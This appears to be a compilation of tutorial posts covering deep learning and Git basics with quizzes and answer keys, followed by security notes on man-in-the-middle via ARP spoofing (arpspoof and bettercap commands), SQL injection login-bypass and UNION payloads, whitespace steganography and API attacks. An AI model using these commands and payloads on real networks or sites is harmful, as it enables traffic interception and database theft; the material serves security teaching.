Deep Learning and Neural Networks – Let’s Dive In!

Today, we’re going to unveil the fascinating world of deep learning and how it supercharges our neural networks.

Define Deep Learning and Its Relationship to Neural Networks

Alright, picture this: neural networks are like the engines of AI, and deep learning is the fuel that makes them roar! 🚗💨

  • Deep Learning: It’s a subset of machine learning that uses neural networks with many stacked layers. Deep learning is all about going deep (hence the name) and extracting intricate patterns from data.
  • Neural Networks: These are the brains of our AI operations. They’re designed to mimic our own brain’s structure, with layers of interconnected ‘neurons.’ Each layer processes data in its unique way, leading to more complex understanding as we go deeper.

For a deeper dive into deep learning, you can check out the official Deep Learning Guide by TensorFlow.
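To make “stacking layers” concrete, here is a toy forward pass in plain Python. The layer sizes, random weights, and ReLU activation are choices made for this sketch only, not anything prescribed above:

```python
import random

random.seed(0)

def dense_layer(inputs, weights, biases):
    """One layer of 'neurons': weighted sum plus bias, then ReLU."""
    return [max(0.0, sum(w * x for w, x in zip(ws, inputs)) + b)
            for ws, b in zip(weights, biases)]

# A "deep" network is just several layers applied one after another.
# Layer sizes 3 -> 4 -> 4 -> 2 are arbitrary, for illustration only.
sizes = [3, 4, 4, 2]
layers = []
for n_in, n_out in zip(sizes, sizes[1:]):
    weights = [[random.uniform(-1, 1) for _ in range(n_in)] for _ in range(n_out)]
    biases = [0.0] * n_out
    layers.append((weights, biases))

activation = [0.5, -0.2, 0.8]      # the input data
for weights, biases in layers:     # going "deeper", one layer at a time
    activation = dense_layer(activation, weights, biases)

print(len(activation))             # 2: the outputs of the final layer
```

Each pass through the loop is one layer transforming the previous layer’s output — which is exactly what “depth” means here.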

Learn Why Deep Neural Networks Are Powerful for Complex Tasks

Imagine your smartphone evolving from a simple calculator to a full-fledged gaming console. That’s what happens when we make neural networks deep! 📱🎮

  • Powerful for Complex Tasks: Deep neural networks can tackle super tough problems. They recognize objects in images, understand human speech, and even beat world champions at board games. 🎉🏆
  • Hierarchical Learning: Each layer in a deep network learns a different level of abstraction. The early layers spot basic features, like edges, while the deeper layers understand complex combinations of these features. It’s like learning to draw lines before creating masterpieces!

To see some real-world applications of deep learning, visit the Deep Learning Examples on the official PyTorch website.

Now, let’s put your newfound knowledge to the test with these questions:

Question 1: What is the relationship between deep learning and neural networks?

A) Deep learning is a type of neural network.
B) Deep learning fuels neural networks.
C) Deep learning uses neural networks with many stacked layers.
D) Deep learning and neural networks are unrelated.

Question 2: How do deep neural networks handle complex tasks compared to shallow networks?

A) They perform worse on complex tasks.
B) They process data in a more basic way.
C) They can recognize intricate patterns and solve complex problems.
D) They require less training.

Question 3: What does each layer in a deep neural network learn as we go deeper?

A) The same information at different scales.
B) Complex patterns and combinations of features.
C) Nothing, they’re just placeholders.
D) Basic features like edges and colors.

Question 4: What’s an example of a complex task that deep neural networks excel at?

A) Simple arithmetic calculations.
B) Recognizing objects in images.
C) Identifying primary colors.
D) Writing poetry.

Question 5: What’s the primary benefit of using deep neural networks for complex tasks?

A) They require less computational power.
B) They process data faster.
C) They can understand intricate patterns.
D) They make AI less powerful.

1C – 2C – 3B – 4B – 5C

Teamwork Made Easy: Using Git for Collaborative Development

In this lesson, we’ll dive into the world of collaborative development using Git. We’ll explore remote repositories and learn how to clone, push, and pull changes to and from them.

Introduce the Concept of Remote Repositories

A remote repository is a Git repository hosted on a server, typically on the internet or a network. It allows multiple developers to collaborate on a project by sharing their changes with one another. Here’s why remote repositories are crucial:

  • Collaboration: Developers working on the same project can access and contribute to the codebase from different locations.
  • Backup: Remote repositories serve as a backup, protecting your project’s history from data loss.
  • Version Control: They provide a central location for tracking changes made by different team members.

Clone a Repository from a Remote Source

Cloning a Repository (git clone):

  • To clone a remote repository to your local machine, use the git clone command, followed by the repository’s URL:
git clone <repository-url>
  • This command creates a local copy of the remote repository, allowing you to work on it and collaborate with others.

Push and Pull Changes from/to Remote Repositories

Pushing Changes to a Remote Repository (git push):

Once you’ve made local commits, you can push those changes to the remote repository:

git push origin branchname

This command sends your local commits to the remote repository.

Pulling Changes from a Remote Repository (git pull):

To retrieve changes made by others in the remote repository, use the git pull command:

git pull origin branchname

This command fetches and merges changes from the remote repository into your current branch.

Collaborative development with Git and remote repositories is an essential part of modern software development.


Question 1: What is the primary purpose of remote repositories in Git?

a) To slow down development.
b) To serve as a personal backup of your code.
c) To enable collaboration and sharing of code among multiple developers.
d) To keep code secret and inaccessible to others.

Question 2: Which Git command is used to clone a remote repository to your local machine?

a) git copy
b) git create
c) git clone
d) git fetch

Question 3: What does the git push command do in Git?

a) Retrieves changes from a remote repository.
b) Deletes all commits from a branch.
c) Sends your local commits to a remote repository.
d) Creates a new branch in the remote repository.

Question 4: How do you fetch and merge changes from a remote repository into your local branch?

a) Use `git update`.
b) Use `git merge origin branchname`.
c) Use `git pull origin branchname`.
d) Use `git push origin branchname`.

Question 5: Why is collaborative development with remote repositories important in Git?

a) It helps developers work in isolation without sharing their code.
b) It ensures that only one person can work on the project at a time.
c) It allows multiple developers to collaborate and track changes effectively.
d) It prevents developers from making any changes to a project.

1C – 2C – 3C – 4C – 5C

How Neural Networks Learn – Let’s Dive In!

Hey there, future AI experts! 🚀

Today, we’re going to uncover the magical way in which neural networks learn from data.

It’s a bit like solving a challenging puzzle, but incredibly rewarding once you grasp it.

Introduce the Concept of Weights and Biases

Think of a neural network as a young chef, eager to create a perfect dish. To achieve culinary excellence, the chef needs to balance the importance of each ingredient and consider personal tastes.

  • Weights: These are like recipe instructions. They assign importance to each ingredient in the dish, guiding how much attention it should receive during cooking.
    Here’s a link to the official TensorFlow documentation on weights and losses.
  • Biases: Imagine biases as the chef’s personal preferences. They influence how much the chef leans towards certain flavors, even if the recipe suggests otherwise.
    For an in-depth look, check out this link to the official PyTorch documentation on biases.
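In code, a single ‘neuron’ is just a weighted sum plus a bias. Here is a minimal sketch with made-up numbers, matching the cooking analogy (weights scale each ingredient, the bias shifts the result):

```python
# One neuron with two inputs (say, quantities of two ingredients).
inputs = [2.0, 3.0]
weights = [0.6, 0.1]   # importance assigned to each ingredient
bias = -0.5            # the chef's personal lean, applied regardless of inputs

output = sum(w * x for w, x in zip(weights, inputs)) + bias
print(round(output, 3))   # 1.0  (2.0*0.6 + 3.0*0.1 - 0.5)
```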

Learn How Neural Networks Adjust Weights to Learn from Data

Our aspiring chef doesn’t achieve culinary brilliance right away; they learn through trial and error, just like perfecting a skateboard trick or acing a video game level.

  • Learning from Mistakes: When the chef’s dish turns out too bland or too spicy, they analyze which recipe notes (weights) need fine-tuning. It’s a process of continuous improvement.

Let’s try another example.

Imagine you’re learning to play a video game, and you want to get better at it. To improve, you need to pay attention to your mistakes and make adjustments. Neural networks work in a similar way when learning from data.

  1. Initial Setup:
    • At the beginning, a neural network doesn’t know much about the task it’s supposed to perform. It’s like starting a new game without any knowledge of the rules.
  2. Making Predictions:
    • Just like you play the game and make moves, the neural network takes in data and makes predictions based on its initial understanding. These predictions might not be very accurate at first.
  3. Comparing to Reality:
    • After making predictions, the neural network compares them to the real correct answers. It’s similar to checking if the moves you made in the game matched what you should have done.
  4. Calculating Mistakes:
    • If the neural network’s prediction doesn’t match the correct answer, it calculates how far off it was. This difference is the “mistake” or “error.” It’s like realizing where you went wrong in the game.
  5. Adjusting Weights:
    • Now, here’s the cool part! The neural network figures out which parts of its “knowledge” (represented as weights) led to the mistake. It fine-tunes these weights, making them a little heavier or lighter. It’s similar to adjusting your game strategy to avoid making the same mistake again.
  6. Repeating the Process:
    • The neural network keeps doing this for many examples, just like you play the game multiple times to get better. With each round, it learns from its mistakes and becomes more accurate.
  7. Continuous Improvement:
    • Over time, the neural network becomes really good at the task, just like you become a pro at the game. It’s all about learning from experiences and fine-tuning its “knowledge” until it gets things right most of the time.

So, in a nutshell, neural networks learn by making predictions, comparing them to reality, calculating mistakes, and adjusting their “knowledge” (weights) to get better and better at their tasks. It’s like leveling up in a game, but instead of gaining experience points, the neural network gains knowledge.
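The steps above can be sketched as a tiny training loop. This is a toy model with a single weight, trained by gradient descent; the data, starting weight, and learning rate are invented for illustration:

```python
# Toy task: learn y = 2*x from examples, starting from a wrong weight.
data = [(1.0, 2.0), (2.0, 4.0), (3.0, 6.0)]   # (input, correct answer)
weight = 0.0                                   # 1. initial setup: knows nothing
learning_rate = 0.05

for epoch in range(200):                       # 6. repeat the process many times
    for x, target in data:
        prediction = weight * x                # 2. make a prediction
        error = prediction - target           # 3-4. compare to reality, measure the mistake
        gradient = error * x                   # which way (and how much) the weight is wrong
        weight -= learning_rate * gradient     # 5. adjust the weight a little

print(round(weight, 3))                        # ~2.0 after training
```

With each epoch the mistakes shrink, which is the “continuous improvement” described in steps 6 and 7.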

Understand the Importance of Training and Optimization

Going back to our chef, becoming a top chef requires dedication and practice. The same applies to neural networks.

  • Training: Think of it as the chef practicing their dish repeatedly, tweaking the ingredients and techniques until they achieve perfection.
    This link to the official Keras documentation provides insights into training neural networks.
  • Optimization: This is like refining the cooking process – finding the ideal cooking time, temperature, and seasoning to create the perfect dish. It’s all about efficiency and quality.
    For a comprehensive understanding, explore this link to the official TensorFlow documentation on optimization.


Now, let’s check your understanding with some thought-provoking questions:

Question 1: What purpose do weights serve in a neural network?

A) They determine the chef’s personal preferences.
B) They assign importance to each ingredient in the dish.
C) They represent the dish’s ingredients.
D) They make the dish taste better.

Question 2: How does a neural network learn from its errors?

A) By avoiding cooking altogether.
B) By making gradual adjustments to weights.
C) By adding more spices to the dish.
D) By trying a different recipe.

Question 3: Why are biases important in a neural network?

A) They ensure that the chef follows the recipe precisely.
B) They add randomness to the cooking process.
C) They influence the chef’s personal taste in flavors.
D) They are not essential in neural networks.

Question 4: What does training in a neural network involve?

A) Cooking a perfect dish on the first attempt.
B) Repeatedly practicing and adjusting the recipe.
C) Ignoring the learning process.
D) Memorizing the recipe.

Question 5: In the context of neural networks, what does optimization refer to?

A) Finding the best cooking method for a dish.
B) Making the dish taste terrible.
C) Using the recipe exactly as it is.
D) Cooking just once to save time.

1B – 2B – 3C – 4B – 5A

Git Harmony: Branch and Merge

Today, we’ll explore the concepts of branches and merging, which are fundamental to collaborative and organized development with Git.

Learn About Branches and Why They’re Important

A branch in Git is like a separate line of development. It allows you to work on new features, bug fixes, or experiments without affecting the main project until you’re ready. Here’s why branches are essential:

  • Isolation: Branches keep your work isolated, so it won’t interfere with the main project or other developers’ work.
  • Collaboration: Multiple developers can work on different branches simultaneously and later merge their changes together.
  • Experimentation: You can create branches to test new ideas without committing to them immediately.

Create and Switch Between Branches

Creating a New Branch (git branch):

To create a new branch, use the following command, replacing branchname with a descriptive name for your branch:

git branch branchname

Switching to a Branch (git checkout):

To switch to a branch, use the git checkout command:

git checkout branchname

Creating and Switching to a New Branch in One Command (git checkout -b):

A common practice is to create and switch to a new branch in one command:

git checkout -b newbranchname

Understand How to Merge Branches

Merging a Branch into Another (git merge):

After making changes in a branch, you can merge those changes into another branch (often the main branch) using the git merge command.

# Switch to the target branch (e.g., main)
git checkout main
# Merge changes from your feature branch into main
git merge feature-branch

Git will automatically integrate the changes from the feature branch into the main branch, creating a new commit.

Branching and merging are powerful tools for managing complex projects and collaborating effectively with others.

Question 1: What is the primary purpose of using branches in Git?

a) To clutter your project with unnecessary files.
b) To prevent any changes to the main project.
c) To isolate different lines of development and collaborate on new features or fixes.
d) To merge all changes immediately.

Question 2: Which Git command is used to create a new branch?

a) git make
b) git branch
c) git create
d) git newbranch

Question 3: How can you switch to a different branch in Git?

a) Use `git goto branchname`.
b) Use `git change branchname`.
c) Use `git checkout branchname`.
d) Use `git swap branchname`.

Question 4: What does the git merge command do in Git?

a) It deletes a branch.
b) It creates a new branch.
c) It integrates changes from one branch into another.
d) It renames a branch.

Question 5: Why might you want to create a branch for a new feature or experiment in Git?

a) To immediately apply changes to the main project.
b) To make your project look more complex.
c) To work on new ideas without affecting the main project.
d) To confuse other developers.

1C – 2B – 3C – 4C – 5C

The Need for Version Control

Why Version Control?

Version control is a system that helps track changes to files and folders over time. It is crucial for several reasons:

  • History Tracking: Version control allows you to maintain a detailed history of changes made to your project files. This history includes who made the changes, what changes were made, and when they were made.
  • Collaboration: In collaborative projects, multiple developers often work on the same codebase simultaneously. Version control enables seamless collaboration by managing changes and ensuring that everyone is working on the latest version of the project.
  • Error Recovery: Mistakes happen. With version control, you can easily revert to a previous working state if something goes wrong, reducing the risk of losing valuable work.
  • Code Reviews: Version control systems facilitate code reviews by providing a platform to discuss and suggest changes before integrating new code into the main project.

What Git Is and Its Role in Collaborative Development

Git is a distributed version control system designed to handle everything from small to very large projects efficiently. It was created by Linus Torvalds in 2005 and has since become the de facto standard for version control in the software development industry.

Key Concepts of Git

  • Repository: A repository, or repo, is a collection of files and their complete history of changes. It exists on your local machine as well as on remote servers.
  • Commit: A commit is a snapshot of your repository at a specific point in time. Each commit has a unique identifier and contains the changes you’ve made.
  • Branch: A branch is a separate line of development within a repository. It allows you to work on new features or fixes without affecting the main codebase.
  • Merge: Merging is the process of combining changes from one branch into another. It’s used to integrate new code into the main project.
  • Pull Request: In Git-based collaboration, a pull request is a way to propose and discuss changes before they are merged into the main branch.

Local vs Remote Repositories

  • Local Repository: A local repository resides on your computer and contains the entire history of the project. You can work on your code, make commits, and experiment without affecting others.
  • Remote Repository: A remote repository is hosted on a server (like GitHub, GitLab, or Bitbucket). It serves as a central hub where developers can share and collaborate on their code. Remote repositories ensure that all team members are working with the same codebase.

Syncing Local and Remote Repositories

To collaborate effectively, you need to sync your local repository with the remote repository:

  • Push: Pushing involves sending your local commits to the remote repository, making your changes available to others.
  • Pull: Pulling is the process of fetching changes from the remote repository and merging them into your local repository.
  • Fetch: Fetching retrieves changes from the remote repository without automatically merging them into your local repository.

In summary, version control, particularly Git, is the backbone of collaborative development. It empowers teams to work together efficiently, track changes, and manage complex projects seamlessly. Understanding the distinction between local and remote repositories is fundamental to successful collaboration.

Man In The Middle (MITM)

In a man-in-the-middle attack, the attacker places themselves in the middle of the communication between the victim and another device (a router, a proxy, another server, and so on), intercepting and reading everything transferred between the two.

One working method to achieve a MITM attack is ARP spoofing.

ARP spoofing

ARP stands for Address Resolution Protocol.

ARP spoofing consists of redirecting packet traffic by abusing the ARP protocol.

ARP allows a device to exchange data with another device on the local network by associating each IP address with a MAC address in a lookup table (the ARP table), in which every IP is “resolved” to a MAC address. This ARP table is kept on every device in the network, so each device knows the “IP – MAC address” pair of every other device in the network.

The attacker then replaces, in the victim device’s ARP table, the MAC address of the gateway with their own. In this way the victim thinks it is exchanging data with the gateway, but in practice it is exchanging data with the attacker. Do you know the movie “Face/Off”?…
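Conceptually, here is what happens to the victim’s ARP table (a plain-Python sketch with made-up addresses; a real attack rewrites the table by sending forged ARP replies rather than editing a dictionary):

```python
# The victim's ARP table before the attack: IP -> MAC
victim_arp_table = {
    "10.0.0.1":  "e4:8f:34:37:ba:04",  # the real gateway
    "10.0.0.20": "3c:22:fb:b8:8c:c6",  # another host on the network
}

attacker_mac = "aa:bb:cc:dd:ee:ff"

# The attacker sends forged ARP replies claiming "10.0.0.1 is at MY MAC",
# so the victim overwrites the gateway entry:
victim_arp_table["10.0.0.1"] = attacker_mac

# From now on, every frame "to the gateway" is addressed to the attacker.
print(victim_arp_table["10.0.0.1"])
```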

To show this ARP table, open your cli and type (in whatever OS):

arp -a

The result is a list of matches in the form <IP> at <MAC address>:

root@kali:~# arp -a
_gateway ( at e4:8f:34:37:ba:04 [ether] on eth0
Giuseppes-MBP.station ( at a4:83:e7:0b:37:38 [ether] on eth0
GiuseppBPGrande.station ( at 3c:22:fb:b8:8c:c6 [ether] on eth0

In our example the router (_gateway) is at e4:8f:34:37:ba:04 and the victim (Giuseppes-MBP) is at a4:83:e7:0b:37:38.

The MITM will try to impersonate the router in the ARP table of the victim.

To do so we can use arpspoof.

With arpspoof we need to modify two ARP tables: the victim’s and the gateway’s:

arpspoof -i <interface> -t <victimip> <gatewayip>

arpspoof -i <interface> -t <gatewayip> <victimip>

Now we’re going to enable IP forwarding, so that packets flowing through our device don’t get dropped but are forwarded to their destination: a packet from the client goes on to the router, and a packet from the router goes on to the client, without being dropped by our device. We enable it with this command:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

The Windows device now thinks that the attacker device is the access point, and whenever the Windows device tries to communicate with the access point, it sends all those requests to the attacker device. This places our attacker device in the middle of the connection, and we will be able to read all the packets, modify them, or drop them.


Another way to impersonate a device in the victim’s ARP table is the tool bettercap.

How to use it:

bettercap -iface <networkinterface>

Then you need to specify a module. In our case we need to enable the net.probe module (to discover devices on the network):

» net.probe on
» [02:09:18] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
» [02:09:18] [sys.log] [inf] net.probe probing 256 addresses on
» [02:09:18] [] endpoint detected as a4:83:e7:0b:37:38 (Apple, Inc.).
» [02:09:18] [] endpoint detected as 3c:22:fb:b8:8c:c6 (Apple, Inc.).
» [02:09:18] [] endpoint detected as 74:d4:23:c0:e4:88.
» [02:09:18] [] endpoint detected as 80:0c:f9:a2:b0:5e.
» [02:09:19] [] endpoint detected as 80:35:c1:52:d8:e3 (Xiaomi Communications Co Ltd).
» [02:09:19] [] endpoint detected as d4:1b:81:15:b0:77 (Chongqing Fugui Electronics Co.,Ltd.).
» [02:09:19] [] endpoint detected as 50:76:af:99:5b:3d (Intel Corporate).
» [02:09:19] [] endpoint detected as b8:27:eb:26:8c:04 (Raspberry Pi Foundation).
» [02:09:20] [] endpoint detected as 20:f4:78:1c:ed:dc (Xiaomi Communications Co Ltd).
» [02:09:20] [] endpoint detected as dc:a6:32:d7:57:da (Raspberry Pi Trading Ltd).
» [02:09:20] [] endpoint detected as 5a:92:d0:37:82:da.
» [02:09:26] [] endpoint detected as 88:66:5a:3d:13:76 (Apple, Inc.).
» [02:09:28] [] endpoint detected as 8e:c0:78:29:bd:34.

After that we can see all the discovered IPs and MAC addresses.

Let’s spoof with fullduplex set to true. This redirects traffic in both directions (from/to the victim and from/to the gateway):

» set arp.spoof.fullduplex true
» set arp.spoof.targets <victimdeviceIP>
» arp.spoof on

We are now in the middle of the connection.

To capture and analyse what is flowing through our system as MITM:

» net.sniff on

From this moment on, everything sent from the victim device will be shown on our screen.

Custom Spoofing script

To avoid typing every single command each time, it’s possible to create a script with all these commands together.

Create a text file (for instance spoofcommands.cap) with the list of all commands:

net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets <victimdeviceIP>
arp.spoof on
net.sniff on

and type the following command:

bettercap -iface <networkinterface> -caplet spoofcommands.cap

SQL Injection

Websites that interact with a database typically use SQL.

If the SQL query is not correctly written, it can be manipulated through the HTML form parameters, into which an attacker can inject malicious SQL code.

Finding a SQL injection is critical because it can give access to the entire DB as an admin.

How to discover SQL Injections

The easy way is to type some special SQL characters, like ' (single quote), " (double quote), or # (comment), into the HTML form inputs and see what happens.

We could get various results — for instance, an exception that shows the query that went wrong.

Bypassing logins using SQL Injections

In a username/password login page, we can set the username and, in the password field, specify a piece of SQL that continues the login query.

Let’s say that the query to login could be something like this:

select * from users where username='$username' and password='$password'

Where $username and $password are dynamically passed from the frontend.

Now, the login query can be hacked by specifying a piece of SQL as the password.

For instance, the password field could be

password' and '1'='1

In this way the query will be

select * from users where username='$username' and password='password' and '1'='1'

A worse SQL injection could be:

$username = admin (or whatever the admin username is)

$password = 123456' or '1'='1

In this case the query becomes:

select * from users where username='admin' and password='123456' or '1'='1'

Because or '1'='1' is always true, this query returns rows even when the password is wrong, allowing us to log in as the admin user without knowing the real password.
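The bypass can be reproduced with a throwaway in-memory SQLite database (a sketch: the users table and its contents are invented for the demo, and the injected password uses the '1'='1 form so the quotes stay balanced):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'realsecret')")

# The vulnerable pattern: user input pasted straight into the query string.
username = "admin"
password = "123456' or '1'='1"   # attacker-controlled input
query = ("select * from users where username='%s' and password='%s'"
         % (username, password))

rows = conn.execute(query).fetchall()
print(rows)   # the admin row comes back despite the wrong password
```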

Another way to use SQL injection to bypass the login is with a comment right after the username, because whatever comes after the comment character is ignored.

For instance a query like this:

select * from users where username = 'admin' #and password ='ciccio'

will return the user whose username is admin, whatever the password is.

In order to have a query like the one above, we need to specify

$username = admin' #

$password = whateverWeWant

The last query is the most interesting one because it allows us to build more complex queries and gather more information from the database.

For instance we can add a union to get something else:

select * from users where username = 'admin' union select 1, database(), user(), version(), 5 #and password ='whateverWeWant'

In this case what we did was to use the following parameters:

$username = admin' union select 1, database(), user(), version(), 5#

$password = whateverWeWant

Or, we can get DB information schema using another query after the union:

$username = admin' union select 1, table_name, null, null, 5 from information_schema.tables#

$password = whateverWeWant

In this way you can get whatever you want from the DB, just by adding a union query with the same number of columns as the first query (in our example, select * from users, which returns five columns).

Tools to Discover SQL Injections

We can use:

  • SQLMap, a CLI tool to automate SQL injections against a specific URL
  • OWASP ZAP, a very easy-to-use UI tool which finds possible SQL injections (and other types of exploitation as well) across the entire website, letting you specify the field parameters to use 🙂

Prevent SQL Injection

To prevent SQL injection in your SQL scripts:

  • filter and validate inputs
  • use parameterised statements!
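Here is what a parameterised statement looks like in practice, as a sketch with Python’s built-in sqlite3 module (the users table is invented for the demo):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'realsecret')")

username = "admin"
password = "123456' or '1'='1"   # the injection string from the login example

# Placeholders: the driver treats the input as DATA, never as SQL.
rows = conn.execute(
    "select * from users where username=? and password=?",
    (username, password),
).fetchall()

print(rows)   # [] -- the injection is just a (wrong) literal password
```

The same input that bypassed the naive string-built query now simply fails to match any password.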

Steganography

Steganography is the practice of hiding a message inside of (or even on top of) something that is not secret.

Steganography has the double mission of hiding and deceiving.

Of course not only messages can be hidden but also malware scripts.


There are a lot of tools that can hide things in images, files, and so on.

Snow is one of these.

Snow stands for Steganographic Nature Of Whitespace.

SNOW is a whitespace steganography tool that embeds hidden messages in ASCII text by appending whitespace to the ends of lines. Since spaces and tabs are not visible in the text, the message stays hidden from a casual audience, and the built-in encryption keeps it unreadable even if the extra whitespace is detected.

Snow is intended to be used with Windows. The Linux version is stegsnow.
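To see the idea (this is not SNOW’s actual algorithm, just a toy scheme), here is a whitespace encoder that appends a space for a 0 bit and a tab for a 1 bit at the end of each cover line:

```python
def hide(cover_lines, message):
    """Append one bit per line end: ' ' = 0, '\t' = 1 (toy scheme)."""
    bits = "".join(f"{ord(c):08b}" for c in message)
    out = []
    for i, line in enumerate(cover_lines):
        suffix = ""
        if i < len(bits):
            suffix = " " if bits[i] == "0" else "\t"
        out.append(line + suffix)
    return out

def reveal(stego_lines):
    """Read the trailing whitespace back into bits, then into characters."""
    bits = "".join("0" if l.endswith(" ") else "1"
                   for l in stego_lines if l.endswith((" ", "\t")))
    chars = [chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits) - 7, 8)]
    return "".join(chars)

cover = ["line %d of an innocent file" % i for i in range(16)]
stego = hide(cover, "Hi")   # "Hi" = 16 bits, so it needs 16 cover lines
print(reveal(stego))        # Hi
```

Like SNOW, the capacity depends on the cover text: here one bit per line, so a longer message needs more lines — which is why stegsnow reports adding extra lines below.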

To hide a message in a file (let’s say readme2.txt) using the content of an existing file (let’s say readme.txt):

stegsnow -C -m "super secret message" -p "passwordtousetodecodemessage" originalfile.txt filewithhiddenmessage.txt 

For instance

root@kali:~# stegsnow -C -m "CIAO MAMMA guarda come mi diverto" -p "magic" readme.txt readme2.txt 
Compressed by 30.30%
Message exceeded available space by approximately 776.19%.
An extra 6 lines were added.

where readme.txt contains some generic content.

After the command, readme2.txt will contain the content of readme.txt plus some extra spaces and tabs.

To decode the content of readme2.txt:

stegsnow -C -p "passwordtousetodecodemessage" filewithhiddenmessage.txt 

For instance:

root@kali:~# stegsnow -C -p "magic" readme2.txt 
CIAO MAMMA guarda come mi diverto

Functional Attacks on API Providers

There are a few common security attacks against an API:

  • SQL Injections
  • Fuzzing
  • Cross-site request forgery
  • Session/token hijacking

SQL Injections

In this attack, the attacker tries to identify the input parameters used in a SQL statement in order to manipulate the original query.


Fuzzing

Fuzz testing, or fuzzing, is a black-box software testing technique which consists of injecting random data into a service in order to find bugs.

A fuzzer would try combinations of attacks on:

  • numbers (signed/unsigned integers, floats, …)
  • chars (URLs, command-line inputs)
  • metadata: user-input text (e.g. ID3 tags)
  • pure binary sequences

A common approach to fuzzing is to define lists of “known-to-be-dangerous values” (fuzz vectors) for each type, and to inject them or recombinations of them:

  • for integers: zero, possibly negative or very big numbers
  • for chars: escaped or interpretable characters / instructions (e.g. for SQL requests: quotes, commands, …)
  • for binary: random sequences

The hacker then analyses the responses to identify vulnerabilities.
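A minimal sketch of vector-based fuzzing in Python — the target function parse_quantity and the vector lists are invented for illustration:

```python
# Known-to-be-dangerous values, one small list per input type.
fuzz_vectors = {
    "integer": [0, -1, 2**31 - 1, -2**31, 10**18],
    "string":  ["'", '"', "admin' #", "<script>", "A" * 10_000, "%s%s%s"],
}

def parse_quantity(raw):
    """A deliberately fragile target: rejects out-of-range values."""
    value = int(raw)
    if not 0 <= value < 1000:
        raise ValueError("quantity out of range")
    return value

findings = []
for vector in fuzz_vectors["integer"]:
    try:
        parse_quantity(vector)
    except Exception as exc:          # a fuzzer records every failure it triggers
        findings.append((vector, type(exc).__name__))

print(findings)
```

A real fuzzer would also inspect what the service sends back for each failure, which is why the error responses you return matter.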

So pay attention to what kind of error response you send back. Don’t return, for instance, a raw SQL exception.

Cross-site request forgery

In this case the hacker is able to execute a script that calls our API from the user’s device.

To mitigate this type of attack: use POST instead of GET, split transactions into multiple steps, and add custom headers.

Token and Sessions Hijacking

This is basically a specialisation of cross-site request forgery, with the goal of getting the token saved on the client device.

So, the user somehow executes the attacker’s script, which reads the token or the session cookie and uses it to access private resources.

In this case, the suggestions are:

  • expire your tokens
  • use complex token patterns
  • use additional security headers; do not rely only on access tokens

Continuous Delivery (CD)

CD is an automated process for delivering code changes to servers quickly and efficiently.

It is the natural extension of CI.

CD, then, is the practice of making sure that the code is always ready to be deployed to production.

The (old) process

The operations team gets regular requests to deploy CI artifacts to servers for QA testing.

Developers and the operations team need to work together to fix any deployment issues, because deployment is not only deploying the artifact but also configuration changes, networking, and so on.

Then, finally, the QA team can test further and send back feedback.

So there is too much human intervention in this process.

The solution is automation.

Every step of deployment should be automated (server provisioning, dependencies, configuration changes, deployment, …):

  • System automation (Ansible, Puppet, Chef, …)
  • Cloud infrastructure automation (Terraform, CloudFormation, …)
  • CI/CD automation (Jenkins, Octopus Deploy, …)
  • Code testing
  • and many others

The Ops team writes the automation code for deployment.

QA testers write the automation code for software tests.

The Dev team writes the application code and its unit tests.